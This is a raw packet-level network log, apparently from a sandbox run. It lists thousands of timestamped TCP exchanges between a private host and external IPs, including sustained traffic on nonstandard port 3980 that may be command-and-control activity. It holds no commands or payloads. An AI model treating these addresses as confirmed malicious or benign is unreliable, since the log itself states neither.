                                                                                    Jan 14, 2025 15:32:07.493607044 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.493741989 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.493798018 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.494199038 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.494250059 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.494467974 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.494527102 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.494661093 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.494709015 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.494939089 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.494988918 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.527909994 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.528080940 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.528081894 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.528110981 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.528141022 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.528157949 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.528330088 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.528414965 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.528692961 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.528749943 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.528980970 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.529040098 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.529275894 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.529326916 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.529484987 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.529536963 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.532704115 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.532759905 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.532916069 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.532967091 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.547600985 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.547669888 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.580311060 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.580353975 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.580375910 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.580390930 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.580400944 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.580414057 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.580435038 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.580629110 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.580673933 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.580677032 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.580686092 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.580713987 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.580939054 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.581176996 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.614795923 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.614886045 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.614908934 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.614943981 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.614943981 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.614976883 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.615000010 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.615009069 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.615042925 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.615104914 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.615187883 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.615257978 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.615428925 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.615487099 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.615585089 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.615636110 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.615781069 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.615832090 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.615940094 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.615991116 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.616086006 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.616142035 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.666933060 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.666984081 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667156935 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.667181969 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667223930 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.667299032 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667351007 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.667470932 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667530060 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.667740107 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667789936 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667798996 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.667804003 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667834997 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.667882919 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.667932034 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.701595068 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.701653004 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.701720953 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:07.701720953 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.701750040 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.701777935 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.702039003 CET61631443192.168.2.5109.99.162.14
                                                                                    Jan 14, 2025 15:32:07.702058077 CET44361631109.99.162.14192.168.2.5
                                                                                    Jan 14, 2025 15:32:12.739645958 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:12.744501114 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:12.744714022 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:12.746195078 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:12.751002073 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.153429031 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.188469887 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:14.193398952 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.669332027 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.689441919 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:14.694319010 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.694396973 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:14.694845915 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:14.699760914 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.720177889 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:14.772214890 CET6163480192.168.2.5178.237.33.50
                                                                                    Jan 14, 2025 15:32:14.777086973 CET8061634178.237.33.50192.168.2.5
                                                                                    Jan 14, 2025 15:32:14.777162075 CET6163480192.168.2.5178.237.33.50
                                                                                    Jan 14, 2025 15:32:14.777337074 CET6163480192.168.2.5178.237.33.50
                                                                                    Jan 14, 2025 15:32:14.782114029 CET8061634178.237.33.50192.168.2.5
                                                                                    Jan 14, 2025 15:32:15.349201918 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:15.351736069 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:15.356693029 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:15.422454119 CET8061634178.237.33.50192.168.2.5
                                                                                    Jan 14, 2025 15:32:15.422524929 CET6163480192.168.2.5178.237.33.50
                                                                                    Jan 14, 2025 15:32:15.474270105 CET616323980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:15.479173899 CET39806163243.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.116988897 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117007971 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117019892 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117029905 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117042065 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117053032 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117064953 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117074966 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117086887 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117090940 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.117096901 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.117135048 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.117135048 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.121982098 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.122004986 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.122072935 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.424583912 CET8061634178.237.33.50192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.424958944 CET6163480192.168.2.5178.237.33.50
                                                                                    Jan 14, 2025 15:32:16.566658974 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.566693068 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.566706896 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.566719055 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.566731930 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.566751957 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.566786051 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.567006111 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.567051888 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.567110062 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.567133904 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.567147017 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.567186117 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.567187071 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.567203999 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.567234039 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.568075895 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568089962 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568104982 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568116903 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568121910 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.568133116 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568156004 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.568201065 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.568919897 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568958998 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568978071 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.568991899 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.569010973 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.569046974 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.569174051 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.610806942 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.653927088 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.653949022 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.653965950 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:16.654022932 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:16.704547882 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.035597086 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.035620928 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.035634995 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.035648108 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.035662889 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.035664082 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.035677910 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.035692930 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.035706043 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.035737038 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.036041975 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036055088 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036067009 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036078930 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.036108017 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.036389112 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036401987 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036415100 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036427975 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036436081 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.036442995 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036458969 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.036475897 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.036495924 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.037125111 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.037137985 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.037162066 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.037173033 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.037203074 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.037219048 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.037233114 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.037244081 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.037249088 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.037267923 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.038003922 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038053989 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.038069010 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038083076 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038095951 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038106918 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038116932 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.038120031 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038134098 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038144112 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.038177013 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.038960934 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038980961 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.038995981 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039007902 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039021969 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.039030075 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039042950 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039061069 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039062977 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.039096117 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.039870977 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039915085 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039921045 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.039930105 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039942980 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039956093 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039966106 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.039969921 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.039984941 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.040007114 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.040013075 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.040803909 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.040817976 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.040859938 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.122184038 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.122205019 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.122221947 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.122253895 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.173309088 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505031109 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505052090 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505064964 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505076885 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505089045 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505106926 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505121946 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505187988 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505222082 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505249023 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505255938 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505264044 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505278111 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505301952 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505302906 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505533934 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505546093 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505558968 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505572081 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505584002 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505605936 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505605936 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505625010 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505861044 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505903006 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505922079 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505934000 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505945921 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505953074 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505961895 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505975008 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.505979061 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.505991936 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506015062 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506016970 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.506040096 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.506556988 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506571054 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506582022 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506594896 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506607056 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506608963 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.506618977 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506633043 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506635904 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.506645918 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506660938 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.506669044 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506681919 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.506711006 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.506711006 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507167101 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507178068 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507189989 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507225037 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507323980 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507335901 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507349014 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507359982 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507374048 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507404089 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507422924 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507587910 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507601023 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507613897 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507635117 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507642984 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507647991 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507666111 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507679939 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507693052 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.507702112 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507702112 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.507738113 CET616333980192.168.2.543.226.229.209
                                                                                    Jan 14, 2025 15:32:17.508282900 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.508301973 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.508316040 CET39806163343.226.229.209192.168.2.5
                                                                                    Jan 14, 2025 15:32:17.508328915 CET39806163343.226.229.209192.168.2.5
